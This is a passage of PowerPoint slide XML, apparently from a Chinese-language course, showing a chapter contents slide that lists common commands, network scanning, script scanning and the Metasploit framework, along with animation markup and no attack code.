                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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Text Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071996" y="2766621"/>
            <a:ext cx="3008380" cy="662379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="1565050"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="982844"/>
              <a:ext cx="1120898" cy="842780"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="2471202"/>
            <a:ext cx="1192345" cy="672217"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="平行四边形 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="2033848"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="3407000"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="平行四边形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="3084852"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596626" y="4316986"/>
            <a:ext cx="1192345" cy="677512"/>
            <a:chOff x="2215144" y="4047039"/>
            <a:chExt cx="1244730" cy="931598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="平行四边形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="4135856"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="1582798"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4615667" y="1005461"/>
              <a:ext cx="3228975" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="953426"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="2508336"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="平行四边形 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="1647579"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="组合 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="3433872"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="2341731"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644506" y="2450133"/>
              <a:ext cx="2827146" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>.3 脚本扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="平行四边形 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="2341731"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="组合 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5502297" y="4359409"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="3035884"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4623073" y="3097846"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="平行四边形 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="3035884"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
    </p:spTree>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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
